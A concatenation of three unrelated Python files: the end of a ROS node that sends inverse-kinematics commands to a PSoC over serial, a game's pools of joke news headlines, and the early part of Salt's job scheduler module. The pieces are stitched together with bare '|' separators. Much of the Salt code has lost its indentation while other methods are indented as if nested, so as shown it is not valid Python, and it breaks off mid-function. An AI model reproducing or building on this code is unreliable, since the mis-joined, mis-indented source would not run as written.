        """
        # When a message is received:
        # 1) format the string to send to the PSoC
        # 2) actually send the message
        # 3) publish the formatted string back out to another debugging topic
        # The ndarray is in
        #invkin_command = np.array(message.data)
        # Let's do a string with the following format, which seems to work OK on the PSoC:
        # u (rl1) (rl2) ... (rln)
        # For example,
        # u 0.02 0.476 0.87 0.05
        # The PSoC will then parse the first character as a command (u = this is a control input)
        # and then the remaining numbers with spaces between them.
        # Now using our own message type:
        invkin_command = np.array(message.invkin_control)
        # A discussion on the length of the string:
        # It may be bad to do more than a 32-character message over UART, that's pretty long.
        # So if we've got 4 cables with 4 colons and a "u", that leaves (32 - 5)/4 = 6 characters per
        # control input. That's 4 digits after the decimal (since we'll never have more than a 1 meter command.)
        # As of 2018-11-29, the PSoC code has a 128-bit receive buffer for UART strings.
        # That means we can do much longer strings. Arbitrarily, choose 6 decimal places.
        # NOTE(review): the formatter below actually emits 8 decimal places
        # ("%.8f"), not the 6 this comment describes -- confirm which is intended.
        # Check: something something single-precision floating point??
        # (again recalling that our invkin outputs are in meters, which will never be greater than 1,
        # so the floats will always be 0.something.)
        # We seem to be getting some mis-aligned commands.
        # So, before anything else, send out a "clear" every time.
        self.serial_port.write("\n")
        # give the PSoC a moment
        # maybe 20 ms?
        rospy.sleep(0.02)
        self.serial_port.write("c\n")
        rospy.sleep(0.02)
        self.serial_port.write("c\n")
        rospy.sleep(0.02)
        # Thanks to our friends on stackoverflow (https://stackoverflow.com/questions/21008858/formatting-floats-in-a-numpy-array),
        # a nice way to format w/ only certain precision is
        def ik_cmd_formatter(x): return "%.8f" % x
        # The result string will be
        cmd_string = "u"
        # and we can concatenate each float to it.
        for i in range(invkin_command.shape[-1]):
            # Add to the command string, with a preceeding space
            cmd_string += " " + str(ik_cmd_formatter(invkin_command[i]))
        # tack on a newline, since the PSoC requires that.
        cmd_string += "\n"
        # Send the message
        self.serial_port.write(cmd_string)
        # And echo back.
        self.pub.publish(cmd_string)

    # The primary helper function here opens the serial device,
    # subscribes to a topic, writes when new data appears on the topic, and
    # echoes (publishes) its pushed data back out on *another* topic for debugging.
    def serial_tx_startup(self, device_name):
        """Initialize the ROS node, subscriber, echo publisher, and serial port.

        device_name: path to the serial device (e.g. '/dev/ttyUSB0').
        Returns (serial_port, publisher) for use by the callback.
        """
        # A welcome message
        # Hard-coding the topic name, doesn't make sense to need to pass it in each time.
        topic_name = 'invkin_tx_commands'
        print("Running serial_tx_fromtopic node with device " + device_name
              + " and topic " + topic_name)
        #print(" and python version:")
        # print(sys.version)
        # Hard-code a timeout for pyserial. Seems recommended, even for tx?
        serial_timeout = 1
        # First, start up the ros node.
        rospy.init_node('serial_tx_fromtopic', anonymous=False)
        # The main functionality here is a subscriber.
        #sub = rospy.Subscriber(topic_name, Float32MultiArray, self.serial_tx_callback)
        sub = rospy.Subscriber(topic_name, InvkinControlCommand, self.serial_tx_callback)
        # We'll publish commands to a topic just in case someone else wants to use them
        pub = rospy.Publisher('serial_tx_echo', String, queue_size=10)
        # Next, do the serial setup:
        # Hard-coded: our PSoC uses the following baud rate:
        psoc_baud = 115200
        # create the serial port object
        serial_port = serial.Serial(device_name, psoc_baud, timeout=serial_timeout)
        # flush out any old data
        serial_port.reset_input_buffer()
        serial_port.reset_output_buffer()
        # finishing setup.
        print("Opened port, subscriber created. Now echoing from topic to serial.")
        # and return the publisher so that the callback can use it.
        # also needs to have the serial port available to the callback.
        return serial_port, pub

    # The constructor calls a helper to initialize everything, and stores the
    # resulting publisher and serial port object that's created.
    def __init__(self, device_name):
        self.serial_port, self.pub = self.serial_tx_startup(device_name)
    # and that's all.
# the main function: create one of these objects, while parsing the serial port path
# and topic name to subscribe to.
# NOTE(review): only sys.argv[1] (the device path) is actually consumed;
# the topic name is hard-coded inside serial_tx_startup.
if __name__ == '__main__':
    # the 0-th arg is the name of the file itself, so we want the 1st and 2nd
    # We're making this a class now.
    s_tx = SerialTxFromTopic(sys.argv[1])
    # We do the spin() in main. It's not appropriate for a constructor.
    try:
        rospy.spin()
    except KeyboardInterrupt:
        pass
|
def get_level_1_news():
    """Return the pool of level-1 news headlines.

    Returns
    -------
    dict
        Maps 'news1' .. 'news21' to headline strings.
    """
    # BUG FIX: two of the original string continuations were missing the
    # separating space, producing "Turns outthose" (news1) and
    # "forthe whole month" (news2); a space is now included.
    headlines = [
        'Stars Wars movie filming is canceled due to high electrical energy used. Turns out '
        'those lasers don\'t power themselves',
        'Pink Floyd Tour canceled after first show used up the whole energy city had for '
        'the whole month. The band says they\'ll be happy to play on the dark side of the town',
        'A public poll shows people are spending more energy on electric heaters after the '
        'start of the cold war',
        "9 in 10 people of your country do not know what the cold war is. The one who knows "
        "is in the military",
        "Scientists says that world temperatures are rising due to high number of home "
        "refrigerators being used worldwide. According to Mr. Midgley, all the earth's"
        " cold is being trapped inside 4 billion refrigerators",
        "Mr. Midgley published a new research where he's proved that ceiling and wall fans"
        " are causing hurricanes",
        "Mr. Midgley, again, says he's discovered a way to revert climate change: everybody"
        " should throw their refrigerator's ice cubes into the ocean",
        "After a whole year of snow falling almost in every corner of the world, Mr. "
        "Midgley says he knows nothing and announced his retirement",
        "Free nuclear fusion energy is a reality, says scientist, we just need to learn "
        "how to do it",
        "RMS Titanic reaches its destiny safely after hitting a small chunk of ice in"
        " the ocean",
        "All the Ice Sculptures business worldwide have declared bankruptcy, says"
        " World Bank",
        "After 'Star Wars: The Phantom Menace' script was leaked people are happy the "
        "franchise got canceled 30 years ago",
        "Microsoft's head says Windows95 will be the last one to ever be launched due to its"
        " low energy use",
        "Programmers for Climate Change Convention ends in confusion after fight over using"
        " tabs or spaces",
        "The series finale of Game of Thrones lowered the Public Well being index of your"
        " nation by x%",
        "Drake's song 'Hotline Bling' is under investigation for being related to higher"
        " temperatures in the US this year",
        "The blockbuster 'Mad Max: Fury Road' shows a sequel of the world we live in, "
        "says director",
        "Lost's last episode is an homage to our own world, which will also have a crappy "
        "ending, says fan",
        "Pearl Harbor movie filming canceled due to the harbor being flooded by the "
        "advancing ocean",
        "Award winning Dwight Schrute's movie 'Recyclops' to gain sequels: 'Recyclops "
        "Reloaded' and 'Recyclops Revolution'",
        "The Simpsons predicted nuclear power scandal in episode where Homer pushes big"
        " red button for no reason",
    ]
    # Key the headlines as news1..news21 (1-based, matching callers).
    return {'news{}'.format(i): text for i, text in enumerate(headlines, start=1)}
def get_level_2_news():
    """Return the pool of level-2 news headline templates."""
    headlines = (
        "Your X index is up Y% and your N index is down because of Z",
        "President PLAYER_NAME canceled Formula 1 race to save fuel, Public well being, "
        "acceptance and co2 emissions are down x%",
    )
    # Keys are news1..newsN, 1-based to match the other levels.
    return {'news{}'.format(i): text for i, text in enumerate(headlines, start=1)}
def get_level_3_news():
    """Return the pool of level-3 news headline templates."""
    headlines = (
        "Your X index is down Y% because of Z",
        "In order to save energy, President PLAYER_NAME sanctions law that prohibits people "
        "of ever ironing their clothes. People are so happy that public well being index is"
        " up x% and energy use is down y%",
    )
    # Keys are news1..newsN, 1-based to match the other levels.
    return {'news{}'.format(i): text for i, text in enumerate(headlines, start=1)}
def get_level_4_news():
    """Return the pool of level-4 news headline templates."""
    # Single entry for this level; keyed for consistency with other levels.
    return {'news1': "Your X index is down Y% and it also affected your Z index which is down N%"}
def get_level_5_news():
    """Return the pool of level-5 news headline templates."""
    headlines = (
        "Your X index is down X%, XYZ thing just happened",
        "The Amazon River, the biggest in the world, dries up and becomes the world's "
        "biggest desert",
        "Plants can no longer recognize what season we are on. They now bloom at random "
        "moments of the year",
    )
    # Keys are news1..newsN, 1-based to match the other levels.
    return {'news{}'.format(i): text for i, text in enumerate(headlines, start=1)}
|
# -*- coding: utf-8 -*-
'''
Scheduling routines are located here. To activate the scheduler make the
schedule option available to the master or minion configurations (master config
file or for the minion via config or pillar)
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour)
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
splay: 15
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour) splaying the time between 0 and 15 seconds
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
splay:
start: 10
end: 15
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour) splaying the time between 10 and 15 seconds
.. versionadded:: 2014.7.0
Frequency of jobs can also be specified using date strings supported by
the python dateutil library.
.. code-block:: yaml
schedule:
job1:
function: state.sls
args:
- httpd
kwargs:
test: True
when: 5:00pm
This will schedule the command: state.sls httpd test=True at 5:00pm minion
localtime.
.. code-block:: yaml
schedule:
job1:
function: state.sls
args:
- httpd
kwargs:
test: True
when:
- Monday 5:00pm
- Tuesday 3:00pm
- Wednesday 5:00pm
- Thursday 3:00pm
- Friday 5:00pm
This will schedule a job to run once on the specified date. The default date
format is ISO 8601 but can be overridden by also specifying the ``once_fmt``
option.
.. code-block:: yaml
schedule:
job1:
function: test.ping
once: 2015-04-22T20:21:00
once_fmt: '%Y-%m-%dT%H:%M:%S'
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday.
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
range:
start: 8:00am
end: 5:00pm
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour) between the hours of 8am and 5pm. The range parameter must be a
dictionary with the date strings using the dateutil format.
.. versionadded:: 2014.7.0
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
range:
invert: True
start: 8:00am
end: 5:00pm
Using the invert option for range, this will schedule the command: state.sls
httpd test=True every 3600 seconds (every hour) until the current time is
between the hours of 8am and 5pm. The range parameter must be a dictionary
with the date strings using the dateutil format.
By default any job scheduled based on the startup time of the minion will run
the scheduled job when the minion starts up. Sometimes this is not the desired
situation. Using the 'run_on_start' parameter set to False will cause the
scheduler to skip this first run and wait until the next scheduled run.
.. versionadded:: 2015.5.0
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
run_on_start: False
args:
- httpd
kwargs:
test: True
.. versionadded:: 2014.7.0
.. code-block:: yaml
schedule:
job1:
function: state.sls
cron: '*/15 * * * *'
args:
- httpd
kwargs:
test: True
The scheduler also supports scheduling jobs using a cron like format.
This requires the python-croniter library.
.. versionadded:: Beryllium
schedule:
job1:
function: state.sls
seconds: 15
until: '12/31/2015 11:59pm'
args:
- httpd
kwargs:
test: True
Using the until argument, the Salt scheduler allows you to specify
an end time for a scheduled job. If this argument is specified, jobs
will not run once the specified time has passed. Time should be specified
in a format supported by the dateutil library.
This requires the python-dateutil library.
.. versionadded:: Beryllium
schedule:
job1:
function: state.sls
seconds: 15
after: '12/31/2015 11:59pm'
args:
- httpd
kwargs:
test: True
Using the after argument, the Salt scheduler allows you to specify
a start time for a scheduled job. If this argument is specified, jobs
will not run until the specified time has passed. Time should be specified
in a format supported by the dateutil library.
This requires the python-dateutil library.
The scheduler also supports ensuring that there are no more than N copies of
a particular routine running. Use this for jobs that may be long-running
and could step on each other or pile up in case of infrastructure outage.
The default for maxrunning is 1.
.. code-block:: yaml
schedule:
long_running_job:
function: big_file_transfer
jid_include: True
maxrunning: 1
By default, data about jobs runs from the Salt scheduler is not returned to the
master. Because of this information for these jobs will not be listed in the
:py:func:`jobs.list_jobs <salt.runners.jobs.list_jobs>` runner. The
``return_job`` parameter will return the data back to the Salt master, making
the job available in this list.
.. versionadded:: 2015.5.0
schedule:
job1:
function: scheduled_job_function
return_job: True
It can be useful to include specific data to differentiate a job from other
jobs. Using the metadata parameter special values can be associated with
a scheduled job. These values are not used in the execution of the job,
but can be used to search for specific jobs later if combined with the
return_job parameter. The metadata parameter must be specified as a
dictionary, otherwise it will be ignored.
.. versionadded:: 2015.5.0
schedule:
job1:
function: scheduled_job_function
metadata:
foo: bar
'''
# Import python libs
from __future__ import absolute_import
import os
import time
import datetime
import itertools
import multiprocessing
import threading
import sys
import logging
import errno
import random
# Import Salt libs
import salt.utils
import salt.utils.jid
import salt.utils.process
import salt.utils.args
import salt.loader
import salt.minion
import salt.payload
import salt.syspaths
from salt.utils.odict import OrderedDict
from salt.utils.process import os_is_running
# Import 3rd-party libs
import yaml
import salt.ext.six as six
# pylint: disable=import-error
try:
import dateutil.parser as dateutil_parser
_WHEN_SUPPORTED = True
_RANGE_SUPPORTED = True
except ImportError:
_WHEN_SUPPORTED = False
_RANGE_SUPPORTED = False
try:
import croniter
_CRON_SUPPORTED = True
except ImportError:
_CRON_SUPPORTED = False
# pylint: enable=import-error
log = logging.getLogger(__name__)
class Schedule(object):
'''
Create a Schedule object, pass in the opts and the functions dict to use
'''
def __init__(self, opts, functions, returners=None, intervals=None):
    """Build a Schedule from the minion/master opts and loaded functions dict."""
    self.opts = opts
    self.functions = functions
    # Accept pre-existing interval bookkeeping; otherwise start fresh.
    self.intervals = intervals if isinstance(intervals, dict) else {}
    # Returners may arrive as a dict-like mapping or as a lazy loader.
    if hasattr(returners, '__getitem__'):
        self.returners = returners
    else:
        self.returners = returners.loader.gen_functions()
    self.time_offset = self.functions.get('timezone.get_offset', lambda: '0000')()
    self.schedule_returner = self.option('schedule_returner')
    # Keep track of the lowest loop interval needed in this variable
    self.loop_interval = sys.maxint
    clean_proc_dir(opts)
def option(self, opt):
'''
Return the schedule data structure
'''
if 'config.merge' in self.functions:
return self.functions['config.merge'](opt, {}, omit_master=True)
return self.opts.get(opt, {})
def persist(self):
    '''
    Write the in-memory schedule out to
    <<configdir>>/minion.d/_schedule.conf as YAML.
    '''
    conf_path = os.path.join(
        salt.syspaths.CONFIG_DIR,
        'minion.d',
        '_schedule.conf')
    log.debug('Persisting schedule')
    try:
        with salt.utils.fopen(conf_path, 'wb+') as fp_:
            fp_.write(yaml.dump({'schedule': self.opts['schedule']}))
    except (IOError, OSError):
        # Best-effort: log and continue with the in-memory schedule.
        log.error('Failed to persist the updated schedule')
def delete_job(self, name, persist=True, where=None):
    '''
    Delete a job from the scheduler.

    name    -- schedule job name
    persist -- also rewrite the on-disk schedule file
    where   -- 'pillar' to delete from the pillar schedule instead of opts
    '''
    if where is None or where != 'pillar':
        # ensure job exists, then delete it
        if name in self.opts['schedule']:
            del self.opts['schedule'][name]
        # BUG FIX: `schedule` was previously bound only when the job
        # existed, raising UnboundLocalError below for unknown names.
        schedule = self.opts['schedule']
    else:
        # If job is in pillar, delete it there too
        if 'schedule' in self.opts['pillar']:
            if name in self.opts['pillar']['schedule']:
                del self.opts['pillar']['schedule'][name]
            schedule = self.opts['pillar']['schedule']
        else:
            # BUG FIX: bind a sane default so the event below can still fire.
            schedule = {}
    # Fire the complete event back along with updated list of schedule
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event({'complete': True, 'schedule': schedule},
                   tag='/salt/minion/minion_schedule_delete_complete')
    # remove from self.intervals
    if name in self.intervals:
        del self.intervals[name]
    if persist:
        self.persist()
def add_job(self, data, persist=True):
'''
Adds a new job to the scheduler. The format is the same as required in
the configuration file. See the docs on how YAML is interpreted into
python data-structures to make sure, you pass correct dictionaries.
'''
# we don't do any checking here besides making sure its a dict.
# eval() already does for us and raises errors accordingly
if not isinstance(data, dict):
raise ValueError('Scheduled jobs have to be of type dict.')
if not len(data) == 1:
raise ValueError('You can only schedule one new job at a time.')
new_job = next(six.iterkeys(data))
if new_job in self.opts['schedule']:
log.info('Updating job settings for scheduled '
'job: {0}'.format(new_job))
else:
log.info('Added new job {0} to scheduler'.format(new_job))
self.opts['schedule'].update(data)
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': self.opts['schedule']},
tag='/salt/minion/minion_schedule_add_complete')
if persist:
self.persist()
def enable_job(self, name, persist=True, where=None):
    '''
    Mark a scheduled job as enabled (in pillar or opts, per ``where``).
    '''
    # Flip the flag in whichever schedule container was requested.
    container = self.opts['pillar'] if where == 'pillar' else self.opts
    container['schedule'][name]['enabled'] = True
    schedule = container['schedule']
    # Fire the complete event back along with updated list of schedule
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event({'complete': True, 'schedule': schedule},
                   tag='/salt/minion/minion_schedule_enabled_job_complete')
    log.info('Enabling job {0} in scheduler'.format(name))
    if persist:
        self.persist()
def disable_job(self, name, persist=True, where=None):
    '''
    Mark a scheduled job as disabled (in pillar or opts, per ``where``).
    '''
    # Flip the flag in whichever schedule container was requested.
    container = self.opts['pillar'] if where == 'pillar' else self.opts
    container['schedule'][name]['enabled'] = False
    schedule = container['schedule']
    # Fire the complete event back along with updated list of schedule
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event({'complete': True, 'schedule': schedule},
                   tag='/salt/minion/minion_schedule_disabled_job_complete')
    log.info('Disabling job {0} in scheduler'.format(name))
    if persist:
        self.persist()
def modify_job(self, name, schedule, persist=True, where=None):
'''
Modify a job in the scheduler.
'''
if where == 'pillar':
if name in self.opts['pillar']['schedule']:
self.delete_job(name, persist, where=where)
self.opts['pillar']['schedule'][name] = schedule
else:
if name in self.opts['schedule']:
self.delete_job(name, persist, where=where)
self.opts['schedule'][name] = schedule
if persist:
self.persist()
def run_job(self, name):
    '''
    Run a scheduled job immediately.

    name -- the job's key in the schedule (opts or pillar).
    '''
    # BUG FIX: merge into a copy. The original called
    # self.opts['schedule'].update(pillar schedule) in place, permanently
    # leaking pillar schedule entries into the minion opts.
    schedule = dict(self.opts['schedule'])
    if 'schedule' in self.opts['pillar']:
        schedule.update(self.opts['pillar']['schedule'])
    data = schedule[name]
    # The function key has historically gone by several names.
    if 'function' in data:
        func = data['function']
    elif 'func' in data:
        func = data['func']
    elif 'fun' in data:
        func = data['fun']
    else:
        func = None
    if func not in self.functions:
        log.info(
            'Invalid function: {0} in job {1}. Ignoring.'.format(
                func, name
            )
        )
    else:
        if 'name' not in data:
            data['name'] = name
        log.info(
            'Running Job: {0}.'.format(name)
        )
        # Spawn as a process (default) or a thread, mirroring handle_func;
        # with multiprocessing we wait for the job to finish.
        if self.opts.get('multiprocessing', True):
            thread_cls = multiprocessing.Process
        else:
            thread_cls = threading.Thread
        proc = thread_cls(target=self.handle_func, args=(func, data))
        proc.start()
        if self.opts.get('multiprocessing', True):
            proc.join()
def enable_schedule(self):
    '''
    Turn the scheduler on and broadcast the updated schedule.
    '''
    self.opts['schedule']['enabled'] = True
    # Fire the complete event back along with updated list of schedule
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event(
        {'complete': True, 'schedule': self.opts['schedule']},
        tag='/salt/minion/minion_schedule_enabled_complete')
def disable_schedule(self):
    '''
    Turn the scheduler off and broadcast the updated schedule.
    '''
    self.opts['schedule']['enabled'] = False
    # Fire the complete event back along with updated list of schedule
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event(
        {'complete': True, 'schedule': self.opts['schedule']},
        tag='/salt/minion/minion_schedule_disabled_complete')
def reload(self, schedule):
'''
Reload the schedule from saved schedule file.
'''
# Remove all jobs from self.intervals
self.intervals = {}
if 'schedule' in self.opts:
if 'schedule' in schedule:
self.opts['schedule'].update(schedule['schedule'])
else:
self.opts['schedule'].update(schedule)
else:
self.opts['schedule'] = schedule
def list(self, where):
    '''
    Fire an event carrying the current schedule items.

    where -- 'pillar' for the pillar schedule only, 'opts' for the opts
             schedule only; anything else merges both (pillar wins).
    '''
    schedule = {}
    if where == 'pillar':
        if 'schedule' in self.opts['pillar']:
            schedule.update(self.opts['pillar']['schedule'])
    elif where == 'opts':
        schedule.update(self.opts['schedule'])
    else:
        # Merged view: opts first, then pillar overrides.
        schedule.update(self.opts['schedule'])
        if 'schedule' in self.opts['pillar']:
            schedule.update(self.opts['pillar']['schedule'])
    # Fire the complete event back along with the list of schedule
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event({'complete': True, 'schedule': schedule},
                   tag='/salt/minion/minion_schedule_list_complete')
def save_schedule(self):
    '''
    Persist the schedule to disk, then fire a saved-notification event.
    '''
    self.persist()
    # Let listeners know the save completed.
    evt = salt.utils.event.get_event('minion', opts=self.opts)
    evt.fire_event({'complete': True},
                   tag='/salt/minion/minion_schedule_saved')
    def handle_func(self, func, data):
        '''
        Execute a scheduled function in this process or thread.

        Runs ``func`` (a key of ``self.functions``) with the job options in
        ``data``: enforces ``maxrunning`` by scanning the proc dir for live
        jobs with the same schedule name, records the job in the proc dir,
        invokes any configured returners, and optionally reports the result
        back to the master (``return_job``).  The proc-dir record is always
        removed on the way out.
        '''
        if salt.utils.is_windows():
            # Since function references can't be pickled and pickling
            # is required when spawning new processes on Windows, regenerate
            # the functions and returners.
            self.functions = salt.loader.minion_mods(self.opts)
            self.returners = salt.loader.returners(self.opts, self.functions)
        # Skeleton of the job record written to the proc dir and handed
        # to returners; 'jid' is a freshly generated job id.
        ret = {'id': self.opts.get('id', 'master'),
               'fun': func,
               'schedule': data['name'],
               'jid': salt.utils.jid.gen_jid()}
        if 'metadata' in data:
            if isinstance(data['metadata'], dict):
                ret['metadata'] = data['metadata']
                ret['metadata']['_TOS'] = self.time_offset
                ret['metadata']['_TS'] = time.ctime()
                # NOTE(review): '%H %m' renders hour + *month number*;
                # '%M' (minutes) was probably intended -- confirm upstream.
                ret['metadata']['_TT'] = time.strftime('%Y %B %d %a %H %m', time.gmtime())
            else:
                log.warning('schedule: The metadata parameter must be '
                            'specified as a dictionary. Ignoring.')
        salt.utils.appendproctitle(ret['jid'])
        # Path of this job's record inside the minion proc directory.
        proc_fn = os.path.join(
            salt.minion.get_proc_dir(self.opts['cachedir']),
            ret['jid']
        )
        # Check to see if there are other jobs with this
        # signature running. If there are more than maxrunning
        # jobs present then don't start another.
        # If jid_include is False for this job we can ignore all this
        # NOTE--jid_include defaults to True, thus if it is missing from the data
        # dict we treat it like it was there and is True
        if 'jid_include' not in data or data['jid_include']:
            jobcount = 0
            for basefilename in os.listdir(salt.minion.get_proc_dir(self.opts['cachedir'])):
                fn_ = os.path.join(salt.minion.get_proc_dir(self.opts['cachedir']), basefilename)
                if not os.path.exists(fn_):
                    # Another thread already reaped this record between
                    # listdir() and here.
                    log.debug('schedule.handle_func: {0} was processed '
                              'in another thread, skipping.'.format(
                                  basefilename))
                    continue
                with salt.utils.fopen(fn_, 'rb') as fp_:
                    job = salt.payload.Serial(self.opts).load(fp_)
                    if job:
                        if 'schedule' in job:
                            log.debug('schedule.handle_func: Checking job against '
                                      'fun {0}: {1}'.format(ret['fun'], job))
                            # Count only live processes running the same
                            # schedule entry.
                            if ret['schedule'] == job['schedule'] and os_is_running(job['pid']):
                                jobcount += 1
                                log.debug(
                                    'schedule.handle_func: Incrementing jobcount, now '
                                    '{0}, maxrunning is {1}'.format(
                                        jobcount, data['maxrunning']))
                                if jobcount >= data['maxrunning']:
                                    log.debug(
                                        'schedule.handle_func: The scheduled job {0} '
                                        'was not started, {1} already running'.format(
                                            ret['schedule'], data['maxrunning']))
                                    return False
                    else:
                        # Empty/unreadable record: best-effort cleanup.
                        try:
                            log.info('Invalid job file found. Removing.')
                            os.remove(fn_)
                        except OSError:
                            log.info('Unable to remove file: {0}.'.format(fn_))
        salt.utils.daemonize_if(self.opts)
        ret['pid'] = os.getpid()
        if 'jid_include' not in data or data['jid_include']:
            log.debug('schedule.handle_func: adding this job to the jobcache '
                      'with data {0}'.format(ret))
            # write this to /var/cache/salt/minion/proc
            with salt.utils.fopen(proc_fn, 'w+b') as fp_:
                fp_.write(salt.payload.Serial(self.opts).dumps(ret))
        # Positional and keyword arguments for the scheduled function.
        args = tuple()
        if 'args' in data:
            args = data['args']
        kwargs = {}
        if 'kwargs' in data:
            kwargs = data['kwargs']
        # if the func support **kwargs, lets pack in the pub data we have
        # TODO: pack the *same* pub data as a minion?
        argspec = salt.utils.args.get_function_argspec(self.functions[func])
        if argspec.keywords:
            # this function accepts **kwargs, pack in the publish data
            for key, val in six.iteritems(ret):
                kwargs['__pub_{0}'.format(key)] = val
        try:
            ret['return'] = self.functions[func](*args, **kwargs)
            # Returner(s) may come from the job data and/or the
            # schedule-wide default.
            data_returner = data.get('returner', None)
            if data_returner or self.schedule_returner:
                if 'returner_config' in data:
                    ret['ret_config'] = data['returner_config']
                rets = []
                for returner in [data_returner, self.schedule_returner]:
                    if isinstance(returner, str):
                        rets.append(returner)
                    elif isinstance(returner, list):
                        rets.extend(returner)
                # simple de-duplication with order retained
                for returner in OrderedDict.fromkeys(rets):
                    ret_str = '{0}.returner'.format(returner)
                    if ret_str in self.returners:
                        ret['success'] = True
                        self.returners[ret_str](ret)
                    else:
                        log.info(
                            'Job {0} using invalid returner: {1}. Ignoring.'.format(
                                func, returner
                            )
                        )
            if 'return_job' in data and data['return_job']:
                # Send back to master so the job is included in the job list
                mret = ret.copy()
                mret['jid'] = 'req'
                channel = salt.transport.Channel.factory(self.opts, usage='salt_schedule')
                load = {'cmd': '_return', 'id': self.opts['id']}
                for key, value in six.iteritems(mret):
                    load[key] = value
                channel.send(load)
        except Exception:
            log.exception("Unhandled exception running {0}".format(ret['fun']))
            # Although catch-all exception handlers are bad, the exception here
            # is to let the exception bubble up to the top of the thread context,
            # where the thread will die silently, which is worse.
        finally:
            # Always remove this job's proc-dir record, whether it
            # succeeded or raised.
            try:
                log.debug('schedule.handle_func: Removing {0}'.format(proc_fn))
                os.unlink(proc_fn)
            except OSError as exc:
                if exc.errno == errno.EEXIST or exc.errno == errno.ENOENT:
                    # EEXIST and ENOENT are OK because the file is gone and that's what
                    # we wanted
                    pass
                else:
                    log.error("Failed to delete '{0}': {1}".format(proc_fn, exc.errno))
                    # Otherwise, failing to delete this file is not something
                    # we can cleanly handle.
                    raise
    def eval(self):
        '''
        Evaluate and execute the schedule

        Walks every job in the configured schedule, decides whether it is
        due (via seconds/minutes/hours/days, 'once', 'when', or 'cron'),
        applies 'range' and 'splay' modifiers, and spawns ``handle_func``
        in a process or thread for each job that should run now.
        '''
        schedule = self.option('schedule')
        if not isinstance(schedule, dict):
            raise ValueError('Schedule must be of type dict.')
        if 'enabled' in schedule and not schedule['enabled']:
            # Scheduler globally disabled; nothing to evaluate.
            return
        for job, data in six.iteritems(schedule):
            if job == 'enabled' or not data:
                continue
            if not isinstance(data, dict):
                log.error('Scheduled job "{0}" should have a dict value, not {1}'.format(job, type(data)))
                continue
            # Job is disabled, continue
            if 'enabled' in data and not data['enabled']:
                continue
            # The target function may appear under any of three keys.
            if 'function' in data:
                func = data['function']
            elif 'func' in data:
                func = data['func']
            elif 'fun' in data:
                func = data['fun']
            else:
                func = None
            if func not in self.functions:
                log.info(
                    'Invalid function: {0} in job {1}. Ignoring.'.format(
                        func, job
                    )
                )
                continue
            if 'name' not in data:
                data['name'] = job
            # Add up how many seconds between now and then
            when = 0
            seconds = 0
            cron = 0
            now = int(time.time())
            # 'until' is an absolute upper bound on when the job may run.
            if 'until' in data:
                if not _WHEN_SUPPORTED:
                    log.error('Missing python-dateutil.'
                              'Ignoring until.')
                else:
                    until__ = dateutil_parser.parse(data['until'])
                    until = int(time.mktime(until__.timetuple()))
                    if until <= now:
                        log.debug('Until time has passed '
                                  'skipping job: {0}.'.format(data['name']))
                        continue
            # 'after' is an absolute lower bound on when the job may run.
            if 'after' in data:
                if not _WHEN_SUPPORTED:
                    log.error('Missing python-dateutil.'
                              'Ignoring after.')
                else:
                    after__ = dateutil_parser.parse(data['after'])
                    after = int(time.mktime(after__.timetuple()))
                    if after >= now:
                        log.debug('After time has not passed '
                                  'skipping job: {0}.'.format(data['name']))
                        continue
            # Used for quick lookups when detecting invalid option combinations.
            schedule_keys = set(data.keys())
            time_elements = ('seconds', 'minutes', 'hours', 'days')
            scheduling_elements = ('when', 'cron', 'once')
            invalid_sched_combos = [set(i)
                                    for i in itertools.combinations(scheduling_elements, 2)]
            if any(i <= schedule_keys for i in invalid_sched_combos):
                log.error('Unable to use "{0}" options together. Ignoring.'
                          .format('", "'.join(scheduling_elements)))
                continue
            invalid_time_combos = []
            for item in scheduling_elements:
                all_items = itertools.chain([item], time_elements)
                invalid_time_combos.append(
                    set(itertools.combinations(all_items, 2)))
            if any(set(x) <= schedule_keys for x in invalid_time_combos):
                log.error('Unable to use "{0}" with "{1}" options. Ignoring'
                          .format('", "'.join(time_elements),
                                  '", "'.join(scheduling_elements)))
                continue
            if True in [True for item in time_elements if item in data]:
                # Add up how many seconds between now and then
                seconds += int(data.get('seconds', 0))
                seconds += int(data.get('minutes', 0)) * 60
                seconds += int(data.get('hours', 0)) * 3600
                seconds += int(data.get('days', 0)) * 86400
            elif 'once' in data:
                # 'once': run exactly at the given timestamp (second precision).
                once_fmt = data.get('once_fmt', '%Y-%m-%dT%H:%M:%S')
                try:
                    once = datetime.datetime.strptime(data['once'], once_fmt)
                    once = int(time.mktime(once.timetuple()))
                except (TypeError, ValueError):
                    log.error('Date string could not be parsed: %s, %s',
                              data['once'], once_fmt)
                    continue
                if now != once:
                    continue
                else:
                    seconds = 1
            elif 'when' in data:
                if not _WHEN_SUPPORTED:
                    log.error('Missing python-dateutil.'
                              'Ignoring job {0}'.format(job))
                    continue
                if isinstance(data['when'], list):
                    # A list of 'when' times: collect the future ones and
                    # use the earliest as the next run time.
                    _when = []
                    for i in data['when']:
                        # Entries may be aliases resolved through pillar or
                        # grains 'whens' dicts, or literal date strings.
                        if ('whens' in self.opts['pillar'] and
                                i in self.opts['pillar']['whens']):
                            if not isinstance(self.opts['pillar']['whens'],
                                              dict):
                                log.error('Pillar item "whens" must be dict.'
                                          'Ignoring')
                                continue
